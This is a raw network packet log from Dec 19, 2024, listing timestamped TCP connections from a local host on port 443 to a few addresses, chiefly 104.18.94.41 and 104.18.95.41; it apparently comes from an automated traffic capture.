                                                                                                                  Dec 19, 2024 11:43:01.620424986 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.620441914 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.627857924 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.627935886 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.627952099 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.636337042 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.636409044 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.636423111 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.645217896 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.645293951 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.645319939 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.645337105 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.645385027 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.811628103 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.815427065 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.815505028 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.815526009 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.815584898 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.815638065 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.823280096 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.831078053 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.831161976 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.831178904 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.839057922 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.839157104 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.839171886 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.846821070 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.846903086 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.846916914 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.854726076 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.854831934 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.854845047 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.862597942 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.862668991 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.862683058 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.878171921 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.878272057 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.878285885 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.885271072 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.885335922 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.885348082 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.892142057 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.892199993 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.892221928 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.899120092 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.899189949 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.899204016 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.906598091 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.906682968 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.906696081 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.955827951 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.955892086 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.003730059 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.003808022 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.006150007 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.006211042 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.006237030 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.015928030 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.015939951 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.016020060 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.016036987 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.025105953 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.025180101 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.025194883 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.025257111 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.029465914 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.033838987 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.033889055 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.033898115 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.033945084 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.042331934 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.042340994 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.042397976 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.050534010 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.050543070 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.050596952 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.059102058 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.059112072 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.059168100 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.063304901 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.063319921 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.063364029 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.063390970 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.071526051 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.071592093 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.079811096 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.079880953 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.084280014 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.084345102 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.092336893 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.092400074 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.100655079 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.100703955 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.104979038 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.105036974 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.196002960 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.196101904 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.200761080 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.200854063 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.204123020 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.204528093 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.210695982 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.210766077 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.213376045 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.213450909 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.219358921 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.219450951 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.225126982 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.225200891 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.230695009 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.230777025 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.233484030 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.233549118 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.236219883 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.236298084 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.236325026 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.236381054 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.236392021 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.236439943 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.236481905 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.236511946 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.236541986 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.236566067 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:02.239597082 CET49734443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:02.239644051 CET44349734104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:02.239736080 CET49734443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:02.239975929 CET49734443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:02.239991903 CET44349734104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:03.063755989 CET49678443192.168.2.1620.189.173.10
                                                                                                                  Dec 19, 2024 11:43:03.450182915 CET44349734104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:03.450521946 CET49734443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:03.450546026 CET44349734104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:03.450890064 CET44349734104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:03.451195955 CET49734443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:03.451258898 CET44349734104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:03.451337099 CET49734443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:03.495341063 CET44349734104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:03.784041882 CET49735443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:03.784084082 CET44349735104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:03.784179926 CET49735443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:03.784574986 CET49735443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:03.784586906 CET44349735104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:03.891319036 CET44349734104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:03.891396999 CET44349734104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:03.891462088 CET49734443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:03.891995907 CET49734443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:03.892014027 CET44349734104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:04.994018078 CET44349735104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:04.994311094 CET49735443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:04.994329929 CET44349735104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:04.994663954 CET44349735104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:04.994960070 CET49735443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:04.995019913 CET44349735104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:04.995110035 CET49735443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:05.035331964 CET44349735104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:05.439448118 CET44349735104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:05.439671993 CET44349735104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:05.439743042 CET49735443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:05.439759016 CET44349735104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:05.439858913 CET44349735104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:05.439915895 CET49735443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:05.440592051 CET49735443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:05.440604925 CET44349735104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:05.813096046 CET49736443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:05.813154936 CET44349736104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:05.813266039 CET49736443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:05.813496113 CET49736443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:05.813507080 CET44349736104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:07.044712067 CET44349736104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:07.045087099 CET49736443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:07.045151949 CET44349736104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:07.045551062 CET44349736104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:07.045979977 CET49736443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:07.046073914 CET44349736104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:07.046175957 CET49736443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:07.091337919 CET44349736104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:07.488322020 CET44349736104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:07.488504887 CET44349736104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:07.488569021 CET49736443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:07.489763975 CET49736443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:07.489785910 CET44349736104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:07.492710114 CET49737443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:07.492759943 CET44349737104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:07.492832899 CET49737443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:07.493055105 CET49737443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:07.493072033 CET44349737104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:07.535717010 CET4968080192.168.2.16192.229.211.108
                                                                                                                  Dec 19, 2024 11:43:07.778511047 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:07.778579950 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:07.778680086 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:07.778950930 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:07.778961897 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:08.714895964 CET44349737104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:08.715285063 CET49737443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:08.715322971 CET44349737104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:08.716504097 CET44349737104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:08.716964960 CET49737443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:08.717134953 CET49737443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:08.717164993 CET44349737104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:08.763336897 CET44349737104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:08.763744116 CET49737443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:08.994499922 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:08.996576071 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:08.996608019 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:08.997740030 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:08.998167038 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:08.998246908 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:08.998331070 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:08.998434067 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:08.998462915 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:08.998557091 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:08.998584986 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.154289007 CET44349737104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.154369116 CET44349737104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.154441118 CET49737443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:09.155272007 CET49737443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:09.155297041 CET44349737104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.610410929 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.610487938 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.610544920 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.610555887 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:09.610590935 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.610611916 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.610645056 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:09.611406088 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.611463070 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:09.611499071 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.618433952 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.618496895 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:09.618516922 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.627084970 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.627161980 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:09.627208948 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.671725988 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:09.671756029 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.719782114 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:09.729981899 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.783736944 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:09.802237034 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.806371927 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.806478024 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:09.806504011 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.813889980 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.813987017 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:09.813993931 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.821778059 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.821882963 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:09.821892023 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.829385042 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.829613924 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:09.829700947 CET49738443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:09.829715967 CET44349738104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.832973957 CET49739443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:09.833019972 CET44349739104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:09.833142996 CET49739443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:09.833462000 CET49739443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:09.833477974 CET44349739104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:11.044641972 CET44349739104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:11.045083046 CET49739443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:11.045113087 CET44349739104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:11.045429945 CET44349739104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:11.045744896 CET49739443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:11.045802116 CET44349739104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:11.045896053 CET49739443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:11.091340065 CET44349739104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:11.489413023 CET44349739104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:11.489610910 CET44349739104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:11.489671946 CET49739443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:11.493943930 CET49739443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:11.493968964 CET44349739104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:13.611498117 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:13.611629009 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:13.611757040 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:13.612011909 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:13.612036943 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:14.828278065 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:14.828604937 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:14.828635931 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:14.829104900 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:14.829402924 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:14.829500914 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:14.829579115 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:14.829696894 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:14.829727888 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:14.829777002 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:14.829783916 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:14.829893112 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:14.829910994 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:14.829931974 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:15.535506964 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:15.535605907 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:15.535641909 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:15.535660028 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:15.535682917 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:15.535722971 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:15.535727978 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:15.535753012 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:15.535788059 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:15.535794973 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:15.535907984 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:15.535955906 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:15.536853075 CET49740443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:15.536870956 CET44349740104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:15.540713072 CET49741443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:15.540786982 CET44349741104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:15.540879965 CET49741443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:15.541147947 CET49741443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:15.541181087 CET44349741104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:16.013741016 CET49742443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:16.013793945 CET44349742104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:16.013885021 CET49742443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:16.014170885 CET49742443192.168.2.16104.21.32.251
